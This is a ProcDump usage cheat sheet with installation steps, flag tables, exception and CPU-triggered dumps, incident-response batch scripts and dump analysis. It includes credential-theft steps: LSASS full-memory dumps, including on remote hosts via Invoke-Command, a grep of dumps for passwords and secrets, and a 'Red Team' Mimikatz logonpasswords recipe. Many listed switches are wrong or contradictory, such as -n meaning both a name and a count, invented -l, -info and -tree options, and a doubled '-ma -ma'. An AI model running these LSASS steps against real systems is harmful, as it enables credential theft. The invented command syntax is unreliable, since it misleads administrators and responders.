ProcDump

ProcDump is a Sysinternals command-line utility for creating crash dumps and monitoring Windows processes. It captures process memory and exceptions for analysis, debugging, and incident response.

Installation

Windows

# Download from Sysinternals Live
# https://live.sysinternals.com/procdump.exe

# Or download from releases
wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip

# Add to PATH
setx PATH "%PATH%;C:\path\to\procdump"

# Verify installation
procdump -?

Linux/macOS (via WSL or Docker)

# WSL on Windows
apt install procdump

# Or use Windows binary directly from WSL
wsl.exe procdump -?

# macOS/Linux: Use equivalent tools
# pstack, gcore, lldb core dumps instead

Verify Installation

procdump -accepteula
procdump -version

Essential Commands

Command	Description
`procdump -p <PID>`	Dump running process by PID
`procdump -n <name>`	Dump process by name
`procdump -ma <PID>`	Full memory dump (all pages)
`procdump -mp <PID>`	Dump only accessible pages
`procdump -e`	Capture on exception
`procdump -f <exception>`	Filter by exception type
`procdump -l`	List all processes
`procdump -x <debugger>`	Launch debugger (windbg, cdb)
`procdump -s <seconds>`	Dump every N seconds
`procdump -n <count>`	Collect N dumps then exit

Basic Process Dumping

Dump by Process ID

# Create single dump of running process
procdump -accepteula -ma 2345

# Dump by process name (multiple instances)
procdump -accepteula -ma explorer.exe

# Dump to specific output directory
procdump -accepteula -ma -o C:\dumps\ 2345

# Dump multiple processes at once
procdump -accepteula -ma -ma explorer.exe svchost.exe lsass.exe

Capture Exceptions

# Dump on any exception
procdump -accepteula -e notepad.exe

# Dump on specific exception type
procdump -accepteula -f EXCEPTION_ACCESS_VIOLATION notepad.exe

# Dump on unhandled exceptions only
procdump -accepteula -e -f UNHANDLED notepad.exe

# First chance vs second chance exceptions
procdump -accepteula -e1 -e2 notepad.exe

Continuous Monitoring

# Dump every 5 seconds (10 times)
procdump -accepteula -s 5 -n 10 explorer.exe

# Dump on CPU threshold exceeded
procdump -accepteula -c 75 explorer.exe

# Dump on hang detected (thread activity)
procdump -accepteula -h explorer.exe

# Dump on process termination
procdump -accepteula -g explorer.exe

Advanced Dumping

Memory Analysis

# Full memory dump (includes all memory pages)
procdump -accepteula -ma lsass.exe

# Partial dump (faster, excludes some memory)
procdump -accepteula -mp svchost.exe

# With custom tag for organization
procdump -accepteula -t lsass.exe C:\dumps\lsass_incident_001.dmp

Debugger Integration

# Attach WinDbg debugger to process
procdump -accepteula -x "C:\Program Files\Debugging Tools for Windows\windbg.exe" notepad.exe

# Attach CDB for automated analysis
procdump -accepteula -x cdb.exe explorer.exe

# Generate minidump for symbols
procdump -accepteula -m explorer.exe

Filter and Targeting

# Exclude threads from dump
procdump -accepteula -e -x <threadID> explorer.exe

# Target specific instance (if multiple)
procdump -accepteula -p 2345 -ma

# Dump process tree (parent and children)
procdump -accepteula -tree explorer.exe

# Override default dump location
procdump -accepteula -o E:\Forensics\ -ma lsass.exe

Incident Response Workflows

Malware Analysis Response

# 1. Quickly dump suspicious process (lsass for credentials)
procdump -accepteula -ma lsass.exe C:\incident\lsass_001.dmp

# 2. Dump on exception to capture crash
procdump -accepteula -e explorer.exe C:\incident\explorer_crash.dmp

# 3. Monitor for repeated failures
procdump -accepteula -s 10 -n 5 suspicious.exe C:\incident\suspicious_series.dmp

# 4. Capture multiple related processes
procdump -accepteula -ma explorer.exe svchost.exe rundll32.exe

# 5. Export for forensic analysis
# Copy dumps to external media
xcopy C:\incident\*.dmp E:\forensic_analysis\

Crash Dump Collection

# Capture all exceptions from application
procdump -accepteula -e -f EXCEPTION_STACK_OVERFLOW app.exe

# Dump only on unhandled exceptions
procdump -accepteula -e -f UNHANDLED myapp.exe

# Multiple dumps with timestamps
procdump -accepteula -ma -s 30 -n 3 myapp.exe C:\dumps\crash_%d_%h_%m_%s.dmp

Performance Analysis

# Dump on high CPU (over 80%)
procdump -accepteula -c 80 explorer.exe

# Monitor and dump on hang
procdump -accepteula -h explorer.exe

# Collect CPU profiling
procdump -accepteula -c 75 -s 5 -n 10 heavy_process.exe

Analyzing Dumps

Extract from Dump

# Open dump in WinDbg for analysis
windbg -z lsass_001.dmp

# Load with specific symbol path
windbg -z -y "srv*C:\symbols*https://msdl.microsoft.com/download/symbols" dump.dmp

# Automatic analysis
!analyze -v

# Extract strings from dump
strings dump.dmp | grep -i "password|key|secret"

# Check for loaded modules
!lm

Dump Inspection

# Verify dump integrity
procdump -y dump.dmp

# Get dump statistics
procdump -info dump.dmp

# Compare two dumps
fc /b dump1.dmp dump2.dmp

Batch Processing

Script for Collection

@echo off
REM Collect dumps of critical processes
cd C:\dumps

REM Dump LSASS (credentials)
procdump -accepteula -ma lsass.exe lsass.dmp

REM Dump explorer (user session)
procdump -accepteula -ma explorer.exe explorer.dmp

REM Dump services
procdump -accepteula -ma svchost.exe svchost.dmp

REM Verify dumps created
dir *.dmp

REM Compress for transport
tar.exe -czf incident_dumps.tar.gz *.dmp

PowerShell Automation

# Dump all process instances matching pattern
Get-Process notepad | ForEach-Object {
    & "C:\tools\procdump.exe" -accepteula -ma $_.Id
}

# Monitor for specific exception
$process = "app.exe"
& "C:\tools\procdump.exe" -accepteula -e $process

# Collect from multiple machines
$computers = @("server1", "server2")
foreach ($computer in $computers) {
    Invoke-Command -ComputerName $computer -ScriptBlock {
        & "C:\tools\procdump.exe" -accepteula -ma lsass.exe "C:\incident\${computer}_lsass.dmp"
    }
}

Troubleshooting

Common Issues

Access Denied / Elevation Required

# Most process dumping requires elevation
# Run as Administrator or use:
runas /user:Administrator procdump -accepteula -ma process.exe

# Check current privileges
whoami /priv

Process Not Found

# List all running processes
procdump -accepteula -l

# Get PID of specific process
tasklist | find "explorer.exe"

# Use full process name
procdump -accepteula -ma "C:\path\to\app.exe"

Dump File Already Exists

# Append sequence number to filename
procdump -accepteula -ma explorer.exe C:\dumps\explorer.dmp
# Creates: explorer.dmp, explorer(1).dmp, explorer(2).dmp, etc.

# Use timestamp in filename
procdump -accepteula -ma explorer.exe C:\dumps\explorer_%d_%h_%m_%s.dmp

Lock/Permission Issues on Dump Files

# File locked by indexing service
taskkill /F /IM SearchIndexer.exe

# Copy dump to different location
copy C:\dumps\crash.dmp E:\forensics\crash.dmp /Y

# Change ownership
icacls C:\dumps\crash.dmp /grant:r %USERNAME%:F

Verification and Troubleshooting

# Verify dump can be opened in debugger
windbg -z dump.dmp

# Check for corruption
fc /b dump1.dmp dump2.dmp

# Get dump file properties
wmic datafile where name="C:\\dumps\\lsass.dmp" get FileSize

# Monitor dumps being created
fsutil usn readjournal C:\ | findstr ".dmp"

Real-World Scenarios

Blue Team: Collect Evidence

REM Incident response: collect critical process memory
@echo off
setlocal enabledelayedexpansion

set DUMP_DIR=C:\forensics\incident_%date:~-4%%date:~-10,2%%date:~-7,2%
mkdir %DUMP_DIR%

echo [*] Collecting LSASS memory (credentials/hashes)
procdump -accepteula -ma lsass.exe %DUMP_DIR%\lsass.dmp

echo [*] Collecting explorer memory (user session)
procdump -accepteula -ma explorer.exe %DUMP_DIR%\explorer.dmp

echo [*] Collecting suspicious services
for /f "tokens=2" %%A in ('tasklist ^| find "svchost"') do (
    procdump -accepteula -ma svchost.exe %DUMP_DIR%\svchost_!random!.dmp
)

echo [*] Securing dumps
icacls %DUMP_DIR% /inheritance:r /grant:r "%USERDOMAIN%\%USERNAME%:F"
tar.exe -czf %DUMP_DIR%.tar.gz %DUMP_DIR%

echo [*] Dumps collected to %DUMP_DIR%

Red Team: Exfiltrate Credentials

REM Dump LSASS for credential extraction
procdump -accepteula -ma lsass.exe lsass.dmp

REM Extract hashes/keys using Mimikatz
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

Malware Analysis: Monitor for Crashes

REM Monitor malware sample for exceptions/crashes
procdump -accepteula -e sample.exe crash_001.dmp

REM Debug with WinDbg attached
procdump -accepteula -x windbg.exe sample.exe

Tips and Best Practices

Always get elevated (Administrator) privileges for dumping system processes
LSASS dumps contain hashes/secrets - handle with care in forensics
Use full dumps (-ma) for complete analysis, partial (-mp) for speed
Timestamp your dumps to maintain chronological integrity
Test dump file integrity before transport or analysis
Dumps can be very large (process memory size) - plan storage
Compress dumps for secure transport: tar.exe or 7z
Clean up dumps after analysis to prevent data leaks
Use -accepteula to suppress confirmation in scripts
Monitor CPU/memory impact when dumping large processes

Resources

ProcDump Official: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
Sysinternals Suite: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite
Windows Debugger (WinDbg): https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/
SANS Incident Handler Handbook
Digital Forensics Incident Response Tools

Last updated: 2026-03-30